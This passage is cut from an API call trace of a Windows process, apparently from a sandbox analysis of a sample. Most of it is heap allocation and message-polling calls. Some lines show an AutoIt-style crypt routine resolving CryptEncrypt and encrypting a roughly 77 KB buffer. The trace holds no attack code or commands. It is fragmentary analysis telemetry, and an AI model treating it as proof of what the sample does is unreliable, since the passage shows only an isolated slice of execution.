Flags=0x0, Size=0x8) returned 0x2e54e08 [0242.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0242.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0242.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0242.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0242.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0242.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0242.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0242.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0242.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0242.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0242.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0242.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13441) returned 0x2e92770 [0242.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0242.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0242.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13441) returned 0x2ea5bc0 [0242.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0242.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0242.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0242.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0242.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0242.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e92770 | out: hHeap=0x970000) returned 1 [0242.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0242.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0242.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0242.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea5bc0 | out: hHeap=0x970000) returned 1 [0242.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0242.810] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0242.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0242.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0242.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0242.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04038 [0242.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0242.810] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04038 | out: hHeap=0x970000) returned 1 [0242.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0242.811] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0242.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0242.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0242.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0242.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0242.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0242.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0242.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0242.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0242.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0242.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0242.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0242.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0242.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0242.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0242.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0242.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0242.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0242.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0242.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0242.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0242.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0242.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0242.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0242.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e514c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0242.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0242.814] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0242.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0242.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.873] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7f320*, pdwDataLen=0x8cef60*=0x13441, dwBufLen=0x13448 | out: pbData=0x2e7f320*, pdwDataLen=0x8cef60*=0x13448) returned 1 [0242.877] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.877] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0242.877] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.877] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.880] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0242.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0242.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0242.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0242.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0242.880] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0242.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0242.880] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0242.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0242.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0242.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0242.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0242.880] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0242.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0242.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0242.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0242.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0242.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0242.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0242.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0242.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0242.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0242.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0242.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0242.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0242.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0242.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0242.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0242.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0242.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0242.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0242.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0242.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0242.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0242.893] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0242.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0242.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0242.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0242.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0242.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0242.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0242.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0242.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0242.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0242.893] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0242.893] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0242.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0242.894] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0242.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04700 [0242.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0242.894] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0242.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04700 | out: hHeap=0x970000) returned 1 [0242.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0242.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0242.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0242.894] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0242.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0242.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0242.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0242.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0242.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0242.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0242.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0242.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0242.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0242.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0242.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0242.895] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0242.895] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0242.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0242.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0242.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0242.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0242.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0242.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0242.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0242.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0242.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0242.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0242.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0242.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13448) returned 0x2e92770 [0242.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0242.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0242.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13448) returned 0x2eb9010 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e92770 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0242.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0242.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13448) returned 0x2e92770 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eb9010 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0242.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0242.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13448) returned 0x2eb9010 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e92770 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0242.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f4e508 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0242.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) 